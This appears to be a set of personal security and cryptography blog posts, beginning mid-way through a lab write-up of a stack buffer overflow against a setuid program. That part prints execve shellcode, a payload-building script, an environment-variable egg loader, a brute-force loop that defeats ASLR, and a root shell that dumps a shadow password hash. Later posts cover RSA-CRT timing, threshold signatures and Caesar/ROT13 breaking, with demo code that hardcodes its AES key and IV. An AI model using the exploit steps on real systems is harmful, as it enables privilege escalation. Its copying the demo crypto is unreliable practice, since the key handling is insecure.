0x0804848d <+9>: mov DWORD PTR [esp+0x4],eax
0x08048491 <+13>: lea eax,[ebp-0x20]
0x08048494 <+16>: mov DWORD PTR [esp],eax
0x08048497 <+19>: call 0x8048380 
0x0804849c <+24>: mov eax,0x1
0x080484a1 <+29>: leave
0x080484a2 <+30>: ret

The buffer variable’s size is 32 bytes according to line 13 and also 32 bytes to reach Stack pointer and plus 4 bytes to reach saved Based pointer. In order to spawn a shell, execve /bin/sh shellcode was generated and placed into badfile after some NOPs (\\x90) . The return address is unknown and also it is a difference between GDB environment and the real-time one. It can be revealed by using:

- Live program tracing (strace/ltrace).

- Modifying the source code.

- Brute-forcing the return address.

- GDB debugging with dumped core (segmentation fault).

We chose the first solution because the second one is unrealistic, the third and fourth one would take much effort.

seed@ubuntu:~/Desktop$ ltrace ./stack
__libc_start_main(0x80484a3, 1, 0xbffff434, 0x8048520, 0x8048590 
fopen("badfile", "r") = 0x804b008
fread(0xbffff187, 1, 517, 0x804b008) = 40
----snippet----

The buffer variable which reads from badfile has address: 0xbffff187. In sum, we construct a payload combined from NOPs, shellcode, ESP (or a random 4bytes), return address 0xbffff187 in little-endian format to an exploitation program called exploit.py which writes the payload to “badfile”:

import struct
shellcode= "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
f = open('badfile','w')
ret = struct.pack('
 
We launch the attack by running the vulnerable program and spawn a root shell successfully.
[12/01/2015 15:25] seed@ubuntu:~/Desktop$ python exploit.py
[12/01/2015 15:25] seed@ubuntu:~/Desktop$ ./stack
# id
uid=1000(seed) gid=1000(seed) euid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),130(wireshark),1000(seed)
# cat /etc/shadow
root:$6$012BPz.K$fbPkT6H6Db4/B8cLWbQI1cFjn0R25yqtqrSrFeWfCgybQWWnwR4ks/.rjqyM7Xwh/pDyc5U1BWOzkWh7T9ZGu.:15933:0:99999:7:::
 
Address Randomization

=====================
There are some conditions in the second task as following:
- The vulnerable program was compiled with chmod 4755 under root permission.
- It was built with options: execstack and -fno-stack-protector to turn off the non-executable stack and StackGuard protections.
- ASLR was turned on.
The above exploitation program was not working and resulted “Segmentation fault (core dumped)” because ASLR was turned on that

assures the program addresses are changed randomly for each execution. There are some techniques to bypass this prevention:
- Brute-forcing or running the exploitation program many times
- Return-oriented programming (or using a branch of this technique: ret2libc)
However the “badfile” input can have a maximum length of only 517 bytes but the observed buffer could be any addresses ranged from 0xbf000000 to 0xbfffffff. It makes the attack difficult to jump into the shellcode exactly even when we fill the whole “str” variable upto 517 bytes with a larger number of NOPs and shellcode placed behind the return address. In order to increase the probability of success, we can utilize an environment variable to hold a larger payload. The following code loads ten thousand bytes of NOPs and shellcode into environment variable EGG.
/* eggcode.c */
#include 
#define NOP 0x90
char shellcode[] =
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80";
int main(void)
{
char shell[10000];
puts("Eggshell loaded into environment.\n");
memset(shell,NOP,10000); /* fill-up the buffer with NOP */
/* fill-up the shellcode on the second half to the end of buffer */
memcpy(&shell[10000-strlen(shellcode)],shellcode,strlen(shellcode));
/* set the environment variable to */
/* EGG and shell as its value, rewrite if needed */
setenv("EGG", shell, 1);
/* modify the variable */
putenv(shell);
/* invoke the bash */
system("bash");
return 0;
}
 
We simply executed the program above then attempted ./stack in the following loop and spawn a root shell in just a minute.
$ sh -c "while [ 1 ]; do ./stack; done;"
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
---snippet---
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
Segmentation fault (core dumped)
# id
uid=1000(seed) gid=1000(seed) euid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),109(lpadmin),124(sambashare),130(wireshark),1000(seed)
 
Stack Guard

===========
The following options describe the conditions of third task:
- The vulnerable program was compiled with chmod 4755 under root permission.
- It was built without the option -fno-stack-protector to turn on the Stack Guard.
- ASLR was turned off.
For this task, we executed the exploitation program again and observed an error message:
seed@ubuntu:~/Desktop$ ./stack
*** stack smashing detected ***: ./stack terminated
Segmentation fault (core dumped)
 
The reason of this error is a protection mechanism used by compiler to detect buffer overflow occurs. It adds random protection variables (called canaries or stack cookies) to the stack. We can get some information about the point of overflow insight by running the program in GDB. For instance, the disassembly of bof() function is different from the previous one:
(gdb) disas bof
Dump of assembler code for function bof:
0x080484d4 <+0>: push ebp
0x080484d5 <+1>: mov ebp,esp
0x080484d7 <+3>: sub esp,0x48
0x080484da <+6>: mov eax,DWORD PTR [ebp+0x8]
0x080484dd <+9>: mov DWORD PTR [ebp-0x2c],eax
0x080484e0 <+12>: mov eax,gs:0x14
0x080484e6 <+18>: mov DWORD PTR [ebp-0xc],eax
0x080484e9 <+21>: xor eax,eax
0x080484eb <+23>: mov eax,DWORD PTR [ebp-0x2c]
0x080484ee <+26>: mov DWORD PTR [esp+0x4],eax
0x080484f2 <+30>: lea eax,[ebp-0x24]
0x080484f5 <+33>: mov DWORD PTR [esp],eax
0x080484f8 <+36>: call 0x80483d0 
0x080484fd <+41>: mov eax,0x1
0x08048502 <+46>: mov edx,DWORD PTR [ebp-0xc]
0x08048505 <+49>: xor edx,DWORD PTR gs:0x14
0x0804850c <+56>: je 0x8048513 
0x0804850e <+58>: call 0x80483b0 <__stack_chk_fail@plt>
0x08048513 <+63>: leave
0x08048514 <+64>: ret
End of assembler dump.
 
The compiler firstly moves a random value to stack at address , and compares these 2 values by using XOR in the end of this

function. If the value in stack is modified then the program will jump to the function stackchkfail() which notifies an error message “stack smashing detected” eventually. This means if our program overwrites the whole stack and tries to illegally control the stack pointers will make it halted. There are some techniques to bypass the Stack Guard : leak the value of canaries or overwrite the entire stack all the way up to the arguments and environment vectors but the stack cookie check would not working properly. Moreover please take a look at this paper.
 
-cmxd

Basic concepts of Chinese Remainder Theorem with respect of RSA/AES

chuymichxinhdep — Fri, 11 Mar 2016 07:29:37 +0000

Chinese Remainder Theorem
=========================

Suppose are positive integers and coprime in pair. For any sequence of integers , there exists an integer x solving the following system of congruence equations:

There exists an unique modulo solution of the system of simultaneous congruences above:

in which:

**Example**:

Solve:
Therefore,

Hence, the solution of this simultaneous congruences is for all k are integers.

RSA using the Chinese remainder theorem
=======================================

In RSA scheme using the Chinese remainder theorem, the following values are precomputed and stored as a public key:

Therefore, we can compute the message from given ciphertext more effienctly as follow:

This scheme is more efficient than computing because these two modular exponentiations both use a smaller exponent and a smaller modulus.

**Proof:**

We know that:

Note that the exponents are reduced module p-1 and q-1. This can be done using Fermat’s little theorem because p and q.Then, we recombine the; that is, we find a number m such that:

Because of the Chinese Remainder Theorem (and because p and q are relatively prime), we can immediately deduce that: which is exactly what we were trying to compute.

Now, the questions in your comments appear to be asking about the details of this recombination step. It is actually fairly easy to see the correctness of the algorithm. To make the last step work, we need to show that we have come up with a value m such that:

As for the the first criteria , well, that’s straight-forward; we know that , and , and so the smallest that m can be is , and the largest it can be is

As for the third criteria, that’s also straight-forward;

Now, is defined to be the number that, when multiplied by q modulo p, results in 1, or . Now, because the above equation is, in fact, computed modulo p, we can replace with 1, which gives us:

Program for secure communication
================================

My following program was written using Python language. It includes 4 main parts:

- Take user text input from the console and encrypt it using AES-128 using built-in library Crypto.Cipher

- Encrypt the AES key using RSA where prime p,q were generated
randomly with the length of 1024 bits

- Decrypt the key

- Using the normal RSA function

def decrypt(self, c,d,n):
return pow(c,d,n)

- Using the CRT approach

 {frame="single"}
def decryptCRT(self,c,p,q,d,dp,dq,qi):
m1 = pow(c,dp,p)
m2 = pow(c,dq,q)
h = (qi*(m1-m2))%p
m = m2+ h*q
return m

- Decrypt the message using AES128 decryption and print it on
the screen.

Report of execution time
========================

Each execution of the encryption and decryption functions is too short. Therefore, I measure the average time of total 1000 executions to compare between each method. To ensure that the time measurement does not affect the process execution, this program used an external call based on Python’s ’timer’ library to calculate the difference between start and end of each run in milliseconds.

self.end = time.time()
self.secs = self.end - self.start
self.msecs = self.secs * 1000 # millisecs
if self.verbose:
print 'Elapsed time: %f ms' % self.msecs

**Functions** **1000 times (second)** **Average (second)**
-------------------- ------------------------- ----------------------
AES128 encryption 0.015999794 0.000016
AES128 decryption 0.014999866 0.000015
RSA encryption 0.254999876 0.000255
RSA decryption 39.37100005 0.039371
RSA CRT decryption 12.02799988 0.012028
Total 51.68499947 0.051685

Table time shows the execution time of RSA scheme is much larger than AES128 scheme. This result explains why RSA should being used in key exchange while parties encrypt their information using AES cryptosystem. Another significant result is that the RSA-CRT decryption method is approximately 3 times faster than normal RSA decryption.

Hope this article can bring cryptography motivation to some Math/IT students and players who were exhausted in enjoying CTF challenges, or at least it can be a good reference for somebody.

-chuymichxinhdep

Ref:

**APPENDIX**

from Crypto.Cipher import AES
import math,random
from fractions import gcd
from random import randrange
from collections import namedtuple
from math import log
from binascii import hexlify, unhexlify
from timer import Timer

class RSA():
def __init__(self):
self.KeyPair = namedtuple('KeyPair', 'public private CRT')
self.Key = namedtuple('Key', 'exponent modulus')
self.KeyCRT = namedtuple('KeyCRT', 'p q')
def is_prime(self,n, k=30):
# Miller-Rabin Test
if n <= 3:
return n == 2 or n == 3
neg_one = n - 1

# write n-1 as 2^s*d where d is odd
s, d = 0, neg_one
while not d & 1:
s, d = s+1, d>>1
assert 2 ** s * d == neg_one and d & 1

for i in xrange(k):
a = randrange(2, neg_one)
x = pow(a, d, n)
if x in (1, neg_one):
continue
for r in xrange(1, s):
x = x ** 2 % n
if x == 1:
return False
if x == neg_one:
break
else:
return False
return True

def randprime(self,N=10**8):
p = 1
while not self.is_prime(p):
p = randrange(N)
return p

def multinv(self,modulus, value):
'''Multiplicative inverse in a given modulus
'''
# http://en.wikipedia.org/wiki/Extended_Euclidean_algorithm
x, lastx = 0, 1
a, b = modulus, value
while b:
a, q, b = b, a // b, a % b
x, lastx = lastx - q * x, x
result = (1 - lastx * modulus) // value
if result < 0:
result += modulus
assert 0 <= result < modulus and value * result % modulus == 1
return result

def keygen(self,N, public=None):
''' Generate public and private keys from primes up to N.
Optionally, specify the public key exponent (65537 is popular choice).
'''

# http://en.wikipedia.org/wiki/RSA
p = self.randprime(N)
q = self.randprime(N)
composite = p * q
totient = (p - 1) * (q - 1)
if public is None:
while True:
private = randrange(totient)
if gcd(private, totient) == 1:
break
public = self.multinv(totient, private)
else:
private = self.multinv(totient, public)
assert public * private % totient == gcd(public, totient) == gcd(private, totient) == 1
return self.KeyPair(self.Key(public, composite), self.Key(private, composite), self.KeyCRT(p, q))
def encrypt(self, m,e,n):
return pow(m,e,n)
def decrypt(self, c,d,n):
return pow(c,d,n)
def decryptCRT(self, c,p,q,d,dp,dq,qi):
m1 = pow(c,dp,p)
m2 = pow(c,dq,q)
h = (qi*(m1-m2))%p
m = m2+ h*q
return m
class PKCS7Encoder():
"""
Technique for padding a string as defined in RFC 2315, section 10.3,
note #2
"""
class InvalidBlockSizeError(Exception):
"""Raised for invalid block sizes"""
pass

def __init__(self, block_size=16):
if block_size < 2 or block_size > 255:
raise PKCS7Encoder.InvalidBlockSizeError('The block size must be ' \
'between 2 and 255, inclusive')
self.block_size = block_size

def encode(self, text):
text_length = len(text)
amount_to_pad = self.block_size - (text_length % self.block_size)
if amount_to_pad == 0:
amount_to_pad = self.block_size
pad = chr(amount_to_pad)
return text + pad * amount_to_pad

def decode(self, text):
pad = ord(text[-1])
return text[:-pad]
iv = "this is iv123456"
key = "this mus be a 16"

def AES_encrypt(iv,key,message):
obj = AES.new(key, AES.MODE_CBC, iv)
pkcs7 = PKCS7Encoder()
return obj.encrypt(pkcs7.encode(message)).encode("hex")

def AES_decrypt(iv,key,cipherText):
obj = AES.new(key, AES.MODE_CBC, iv)
pkcs7 = PKCS7Encoder()
return pkcs7.decode(obj.decrypt(cipherText.decode('hex')))

message = raw_input("Input message:")
with Timer() as t:
cipherText = AES_encrypt(iv,key,message)

print cipherText
print "AES encrypt: %s s" % t.secs

rsa = RSA()
pk,sk,primes = rsa.keygen(2**1024, 65537)

message = int(cipherText.encode("hex"),16)

with Timer() as t:

rsacipher = rsa.encrypt(message,pk.exponent, pk.modulus)

print rsacipher

print "RSA Encrypt: %s s" % t.secs
with Timer() as t:

messagersa = hex(rsa.decrypt(rsacipher, sk.exponent,sk.modulus)).replace("0x","").replace("L","").decode('hex')
print "RSA Decrypt: %s s" % t.secs
print messagersa
#Pre compute RSA CRT
p = primes.p
q = primes.q
dp = sk.exponent % (p-1)
dq = sk.exponent % (q-1)
qi = rsa.multinv(p,q)
#RSA-CRT Decryption

with Timer() as t:
for i in xrange(1):
messagersacrt = hex(rsa.decryptCRT(rsacipher,p,q,sk.exponent,dp,dq,qi)).replace("0x","").replace("L","").decode('hex')
print "RSA Decrypt CRT : %s s" % t.secs
print messagersacrt

with Timer() as t:
plainText = AES_decrypt(iv,key,messagersa)
print "Decrypted message:", plainText
print "AES decrypt: %s s" % t.secs
```

Introduction to Threshold signature scheme

chuymichxinhdep — Thu, 10 Mar 2016 03:07:10 +0000

THRESHOLD SIGNATURE SCHEME

Introduction

Assuming there are 20 employees in a company, and if each employee has his or her own copy of the secret key then it is hard to assure on individuals due to compromise and machine break down. In the other hand, if there is a valid signature requires all 20 employees’ signature in the company then it will be very secure but not be easy to use. Therefore we can implement a scheme which requires only sign 5 or more out of 20 employees then it will be valid and that is exactly what a (5,20) threshold signature scheme tries to achieve. In addition, if a threat agent wants to compromise the system and obtain a message, he must compromise at least 5 people in the scheme and that is a harder thing to do compared to a traditional public scheme.

2. Threshold signature scheme

Threshold signature scheme is a branch of public key cryptography and multi-party computation particularly. In a k-out-of-n threshold crypto-system (k, n) where 1 < k ≤ n, we generate and split the secret decryption exponent d into n different pieces D₁,…,D_n, which are then distributed privately to n parties. This enables:

• Knowledge of any k or more D_i pieces makes D easily computable.

• Knowledge of any k- 1 or fewer D_i pieces leaves D completely undetermined (in the sense that all its possible values are equally likely) [1]

2.1. Shared RSA Threshold Scheme

Similarly to traditional RSA, in shared RSA scheme, we have the public components are moduli N= pq and the encryption exponent e where e is co-prime to N. Additionally, both Boyd [2] and Frankel [3] independently proposed a simple and solution for distributed RSA. The decryption key d is additively shared amongst n parties where d = d₁ + d₂ + · · · + d_n, and signing is simply calculated as follows:

s = m^d= m^d₁· · · m^d_n(mod N), and each s_i = m^di (mod N) is called the partial signature or signature share.

Decryption is more complicated as there are more parties who get involved in the scheme. Assuming there are n parties and the prime factors of N remain unknown to every person. Each party Pi now only knows the tuple < p_i, q_i, d_i > and keeps it secret to any other parties, and they are also required to satisfy the four following conditions:

1. p is an unknown big prime number and

2. q is an unknown big prime number and

3. The unknown decryption exponent

4. And ed = 1 (mod φ(N )).

I am going to show a way to encrypt a message and decrypt a cipher text based on Discrete Logarithm Problem presented in [4].

Encryption: is similar to RSA :
Decryption: each party computes and then sends to all other parties. Each party knows all and then can recovers the original message (m) [5] as follow:

Advantages: Simple and easy to deploy.
Disadvantages: requires a trusted party and there is no verification process to avoid compromised party.

Proof:

Example:

Let p=47 and q=59, then N=pq=2773 and (p-1)(q-1)=2668. Assume e=17, we can calculate the value for d with 17d=1(mod 2668) or d=157. Each party Pi knows the tuple < p_i, q_i, d_i> : <13,19,61>, <11,23,53>, <23,17,43> respectively where p = 47 =13+11+23 ; q=59=19+23+17; and d=157=61+53+43. If the message is ready for the encryption is represent by m=9, then calculation of the ciphertext yields: .

Decipherment of the text requires knowledge of from all parties then it follows that:

=9, which is the original message.

2.2. Shamir’s Secret Sharing Scheme and Lagrange Coefficient

A trusted dealer has a secret s and chooses a large prime number p > n, the number of parties. Unless otherwise stated, all arithmetic operations are done modulo p. The dealer picks a₁, …, a_t−1uniformly random from Z𝑝 and defines P(x) = . Party Pi gets share s_i= P(i) privately from the dealer. To reconstruct the secret s, any t parties come together. They can recover the secret by solving the system of linear equations: . We can also denote .

Proof:

Larrange interpolation over with

Example:

Shamir’s threshold (3,4) over Z₇:

Distribution: Dealer has secret s=4 and picks . Hence, polynomial . Dealer sends s₁=4 to P₁, s₂=0 to P₂, s₃=6 to P₁, s₄=1 to P₄.

Reconstruction: When P₁, P₃ and P₄ come together, we have:

s =

2.3. Threshold ElGamal based on Shamir’s Secret Sharing Scheme

2.3.1 Threshold ElGamal scheme

Similarly to traditional ElGamal encryption scheme, in threshold ElGamal, we have the public components are (p,g,h) and private key in threshold environment. The dealer picks a₁, …, a_t−1uniformly random from Z𝑝 and defines P(x) = . Party Pi gets share s_i= P(i) privately from the dealer. This scheme of both construction and reconstruction of the secret is similar to the previous scheme based on Shamir’s Lagrange.

Example: public key (23, 5, 8) and private key = 6 in a (3,5)-threshold scheme [6].

Standard ElGamal encryption with message m and public key.

Decryption

Trusted dealer and every party can receive cipher = (B, c). Assume 3 parties {2,4,5} meet together to compute decryption share:

Trusted dealer computes using Shamir’s Lagrange: . Then compute

However, this scheme still requires a trusted third party (dealer) which is the most disadvantage when being compromised. Broadcasting partial secret information is used to avoid this problem using distributed key generation (DKG) as follow:

Each party acts as dealer picks a₁, …, a_t−1uniformly random from Z𝑝 and defines P_i(x) = . Party Pi sends s_i,j= P_i(j) privately to party P_j. All parties compute their secret key share: . And secret key .
To decrypt a given ciphertext (c₁,c₂). Let Q be any subgroup of size t, for example {P₁,…,P_t}. Each party P_j of Q broadcast then compute . Thereafter, compute .

It is easy to prove that nobody can gain information about , however there is no verification if parties deviate from this scheme. In general, verifiable secret sharing ensures that even if the dealer is malicious there is a well-defined secret that the players can later reconstruct while in standard secret sharing, the dealer is assumed to be trusted. The concept of verifiable secret sharing (VSS) was first introduced in [7]. Therefore, I am going to show you two schemes to verify secret sharing: Feldman’s VSS scheme.

2.3.2 Threshold El-Gamal based on DKG and Feldman’s Verifiable Secret Sharing

Each party P_i picks a_i,1, …, a_i,t−1uniformly random from Z𝑝 in given group G = of order p and defines P_i(x) = . Party Pi shares s_i,j= P_i(j) privately to party P_j and broadcasts and . Hence all parties P_j can check own share: , compute key share: and compute verification key of P_i:

To decrypt a given ciphertext (c₁,c₂). Let Q be any subgroup of size t, for example {P₁,…,P_t}. Each party P_j of Q broadcast similar to DKG scheme then compute . Use Zero knowledge proof to prove Thereafter, compute .[8]

Advantages: It does not require any trusted dealer and still can generate the public/private key pair efficiently with verification process.
Disadvantages: All parties’ identity need to be known to all other parties through every step.

4.Conclusion

Different applied schemes using threshold signature scheme is proposed in this report that includes: RSA shared secret, Shamir’s secret sharing, Elgamal threshold scheme, distributed key generation and verification as well as advantages and disadvantages of each scheme.

-cmxd

REFERENCES

[1] A. Shamir. How to share a secret. Communications of the ACM, 22, 612–613, 1979

[2] C. Boyd. Digital Multisignatures. Cryptography and Coding 1989. Institute of Mathematics and its application, IMA. 241–246, Clarendon Press, 1989

[3] Y. Frankel. A practical protocol for large group oriented networks. Advances in Cryptology – EUROCRYPT ’89, Springer-Verlag LNCS 434, 56–61, 1989.

[4] P. Paillier. Public key crypto-systems based on composite residue classes. Advances in Cryptography - EIROCRYPT ’99. Springer-Verlag LNCS 1070, pp. 72-83, 1996.

[5] H.L. Nguyen, RSA Threshold Cryptograph. University of Bristol, 2005.

[6] Björn Groneberg, Threshold Cryptography slides. University of Potsdam, 2013.

[7] Benny Chor, Shafi Goldwasser, Silvio Micali, Baruch Awerbuch. Verifiable secret sharing and achieving simultaneity in the presence of faults, SFCS '85 Proceedings of the 26th Annual Symposium on Foundations of Computer Science p. 383-395,1985.

[8] Dr. S.J.A. de Hoogh, Threshold Cryptography slides. TU/D, 2014.

Deciphering Ceasar basic concept

chuymichxinhdep — Tue, 08 Mar 2016 17:15:10 +0000

Deciphering

Ciphertext: “VaqrprzoreoeratraWhyvhfraJnygreUbyynaqreqrgjrroebrefinaRqvguZnetbganne

NzfgreqnzNaarjvytenntzrrxbzraznnezbrgabtrrarragvwqwrovwbzn

oyvwiraBznmnyurgzbrvyvwxuroorabzNaarabtrracnnejrxraqnnegrubhqrafpuev

wsgRqvguSenaxvarraoevrsnnaTregehqAnhznaauhaiebrtrerohhezrvfwrvaSenaxs

hegnzZnva”

The given ciphertext has only letters without space, punctuation or separated key, there are two classic cipher systems such as substitution cipher and transposition cipher which are known to be easy to attack by using frequency analysis or bruteforce techniques.

1. Bruteforce

Firstly, it is suggested that some sorts of simple substitution cipher has been used and Ceasar cipher is one of the most popular and simplest known encryption techniques. This encryption can be represented by aligning two alphabets; the ciphertext is the plain alphabet rotated left or right by some numbers of positions. It can be represented using modular arithmetic as well by first converting the letters into numbers such as A = 0, B = 1,..., Z = 25. Encryption of a letter x by a shift n can be described as E(x)=(x+n)mod 26 and the decryption is similarly D(x)=(x-n) mod 26. One way to break this is printing out all results with possible shifts of ciphertext by using bruteforce where the shift ranges from 1 to 26 (assuming they are only lower/uppercase letters in ASCII table). By using the Python program [1], there is a readable output as follow:

This result is in Dutch language and it means: “In December, bringing Juliusen Walter Hollander's two brothers Edith Margot to Amsterdam Anne would like to come but it must no be zero in some time with Grandma Omazal have tired of hard-to for Anne no no few weeks to keep writes Edith Frank Smash letter to Gertrud Naumann, their former neighbor in Frankfurtam Main”.

2. Frequency analysis

By analysing the frequency of ciphertext’s letters, and by knowing the expected distribution of letters in the original language of the plaintext, we can easily decipher substitution ciphertext by trying several combinations of mappings between ciphertext and plaintext letters based on the statistic. The letter frequency of the given ciphertext was derived by using the script [2] which shows the most frequently used letter: “R”. Given that the plaintext is in English, Dutch, German or Turkish, and there are many published frequency result extracted from common books such as: “etaoinsrhldcumfpgwybvkxjqz”, “enatirodslghvkmubpwjczfxy(ëéó)q”, “enisratdhulcgmobw fkzvüpäßjöyqx”, and “aeinrlıdkmuytsboüşzgçhğvcöpfjwxq” respectively^[1].

In substituting the letters appeared the most in ciphertext by letters from those result above, I recognize the language of plaintext must be in Dutch. Because after replacing 2 most frequently used Dutch letter R, A in ciphertext with E, N respectively, I found out that the 3-letter-word “een” (means “a” in English) appeared with high frequency and this word is one of the most popular Dutch words^[2]. Keep replacing others based on the popular Dutch frequency letter with some guessing as described in [3], we get the final text which is similar to the first result.

3.Encryption algorithm improvements

Method 1:

This encryption can be improved by rotating left or right each letters by different numbers of positions. Firstly we convert the letters into numbers such as A = 0, B = 1,.., Z = 25. Encryption of a letter x_i can be described as E(x_i )=(x_i+n*i)mod 26 and the decryption is similarly D(x_i )=(x_i-n*i) mod 26 where i is the letter’s position in plaintext or ciphertext. It will be difficult for attackers to use frequency analysis without knowing the encipher method and number n. An example of n=2 is described in [4].

Method 2:

This encryption can be improved by substituting each letters with a pseudo-random generated array of letters. Given an alphabet array consisting of uppercase and lowercase letters:

[a,b,c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z,A,B,C,D,E,F,G,H,I,J,K,L,M,N,O,P,Q,R,S,T,U,V,W,X,Y,Z]

We shuffle this array by initializing a basic random generator with a seed number which can be the key or the time when this text was enciphered, then we have a Pseudo-random Array (PRA). We convert the letters into numbers such as A = 0, B = 1,.., Z = 25. Encryption of a letter x can be described as and the decryption is similarly where index is a function shows the letter’s position in array. The result consists of random uppercase or lowercase letters independent of plaintext. It will be difficult for attacker to use frequency analysis despite knowing the encipher method, however attackers can still bruteforce the seed if they know initial array’s order and a small value of seed was implemented. An example of seed=0xFFFFFFF is described in [5].

However, I've got a question for viewers: Do you think this kind of encryption seems tobe complex but it can still be beaten by simple substitution cipher analysis?

4. Conclusion

ROT13 is used in this encipher method with replaces a letter with other 13 letters after it in the alphabet. It can be easily broken even in a ciphertext-only scenario by using bruteforce and frequency analysis.

-cmxd

APPENDIX

[1]

import string
ciphertext = 'VaqrprzoreoeratraWhyvhfraJnygreUbyynaqreqrgjrroebrefinaRqvguZnetbganneNzfgreqnzNaarjvytenntzrrxbzraznnezbrgabtrrarragvwqwrovwbznoyvwiraBznmnyurgzbrvyvwxuroorabzNaarabtrracnnejrxraqnnegrubhqrafpuevwsgRqvguSenaxvarraoevrsnnaTregehqAnhznaauhaiebrtrerohhezrvfwrvaSenaxshegnzZnva'
for i in range(0,26):
    plaintext = ''
    for c in ciphertext:
        if c in string.uppercase:
            newpos = string.uppercase.find(c)+i
            if newpos>25 : newpos -= 26
            plaintext += string.uppercase[newpos]
        if c in string.lowercase:
            newpos = string.lowercase.find(c)+i
            if newpos>25 : newpos -= 26
            plaintext += string.lowercase[newpos]
    print "Shift:"+str(i)+" : "+plaintext

[2]

# -*- coding: utf-8 -*-
import collections, string
cipher = 'VAQRPRZOREOERATRAWHYVHFRAJNYGREUBYYNAQREQRGJRROEBREFINARQVGUZNETBGANNENZFGREQNZNAARJVYTENNTZRRXBZRAZNNEZBRGABTRRARRAGVWQWROVWBZNOYVWIRABZNMNYURGZBRVYVWXUROORABZNAARABTRRACNNEJRXRAQNNEGRUBHQRAFPUEVWSGRQVGUSENAXVARRAOEVRSNNATREGEHQANHZNAAUHAIEBRTREROHHEZRVFWRVASENAXSHEGNZZNVA'
dem = [[0, chr(i + ord('A'))] for i in range(26)]
for ch in cipher:
    if ch not in string.uppercase:
        continue
    dem[ord(ch) - ord('A')][0] += 1
count = {}
dem.sort()
dem = dem[::-1]
print "Letter Frequency: ", dem
for ch in [cipher[i:i+2] for i in xrange(0, len(cipher)-1)]:
    if (not count.get(ch)):
        count[ch]=1
    else:
        count[ch]+=1
print "2 letters Frequency: ", collections.OrderedDict(sorted(count.items(), key=lambda t: t[1]))
count = {}
for ch in [cipher[i:i+3] for i in xrange(0, len(cipher)-2)]:
    if (not count.get(ch)):
        count[ch]=1
    else:
        count[ch]+=1
print "3 letters Frequency: ",  collections.OrderedDict(sorted(count.items(), key=lambda t: t[1]))

[3]

a = {}
# #e n a t i r o d s l g h v k m u b p w j c z f x y (e e o) q DUTCH
#e n a r m i t o d u b l j h g s k f w v c z p y x q
a['R'] = 'E'
a['A'] = 'N'
a['N'] = 'A'
a['E'] = 'R'
a['Z'] = 'M'
a['V'] = 'I'
a['G'] = 'T'
a['B'] = 'O'
a['Q'] = 'D'
a['O'] = 'B'
a['H'] = 'U'
a['Y'] = 'L'
a['W'] = 'J'
a['U'] = 'K'
a['T'] = 'G'
a['X'] = 'U'
a['S'] = 'F'
a['F'] = 'S'
a['J'] = 'W'
a['I'] = 'V'
a['P'] = 'C'
a['M'] = 'Z'
a['C'] = 'P'
plaintext = ''
for ch in cipher:
    if ch in a.keys():
        plaintext = plaintext + a[ch]
    else:
        plaintext = plaintext + '*'
print plaintext

[4]

import string
plaintext="IndecemberbrengenJuliusenWalterHollanderdetweebroersvanEdithMargotnaarAmsterdamAnnewilgraagmeekomenmaarmoetnogeeneentijdjebijomablijvenOmazalhetmoeilijkhebbenomAnnenogeenpaarwekendaartehoudenschrijftEdithFrankineenbriefaanGertrudNaumannhunvroegerebuurmeisjeinFrankfurtamMain"
ciphertext=""
for i in range(1,len(plaintext)+1):
    shift = (2*i%26)
    if plaintext[i-1] in string.uppercase:
        newpos = string.uppercase.find(plaintext[i-1])+shift
        if newpos>25 : newpos -= 26
        ciphertext += string.uppercase[newpos]
    elif plaintext[i-1] in string.lowercase:
        newpos = string.lowercase.find(plaintext[i-1])+shift
        if newpos>25 : newpos -= 26
        ciphertext += string.lowercase[newpos]
print "Ciphertext: ", ciphertext
#Decipher
plaintext=""
for i in range(1,len(ciphertext)+1):
    shift = (2*i%26)
    if ciphertext[i-1] in string.uppercase:
        newpos = string.uppercase.find(ciphertext[i-1])-shift
        if newpos<0 : newpos += 26
        plaintext += string.uppercase[newpos]
    elif ciphertext[i-1] in string.lowercase:
        newpos = string.lowercase.find(ciphertext[i-1])-shift
        if newpos<0 : newpos += 26
        plaintext += string.lowercase[newpos]
print "Plaintext: ", plaintext

[5]

import random
def random_encipher(string,seed):
   random.seed(seed)
   alphabet = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"]
   random.shuffle(alphabet)
   ciphers = ""
   for letter in string:
    if ord(letter) >=97:
       index = ord(letter)-97
       cipher = alphabet[index]
       ciphers+=cipher
    else:
       index = ord(letter)-65
       cipher = alphabet[26+index]
       ciphers+=cipher
   return ciphers
def random_decipher(string,seed):
   random.seed(seed)
   alphabet = ["a","b","c","d","e","f","g","h","i","j","k","l","m","n","o","p","q","r","s","t","u","v","w","x","y","z","A","B","C","D","E","F","G","H","I","J","K","L","M","N","O","P","Q","R","S","T","U","V","W","X","Y","Z"]
   random.shuffle(alphabet)
   plaintext = ""
   for letter in string:
    index=alphabet.index(letter)
    if index >=26:
       plaintext += chr(65+index-26)
    else:
       plaintext += chr(97+index)
   return plaintext
ciphertext= random_encipher("IndecemberbrengenJuliusenWalterHollanderdetweebroersvanEdithMargotnaarAmsterdamAnnewilgraagmeekomenmaarmoetnogeeneentijdjebijomablijvenOmazalhetmoeilijkhebbenomAnnenogeenpaarwekendaartehoudenschrijftEdithFrankineenbriefaanGertrudNaumannhunvroegerebuurmeisjeinFrankfurtamMain",0xFFFFFFF )
print "Ciphertext: ", ciphertext
print "Plaintext: ",random_decipher(ciphertext, 0xFFFFFFF )

http://www.letterfrequency.org ↑
https://en.wiktionary.org/wiki/Wiktionary:Frequency_lists#Dutch ↑

BackdoorCTF Writeup

chuymichxinhdep — Fri, 03 Apr 2015 06:50:03 +0000

backdoor CTF 2015: NONAME

Category: Exploit Points: 200 Author: Amanpreet Singh Difficulty: Solves: 25 Description:

https://backdoor.sdslabs.co/challenges/NONAME

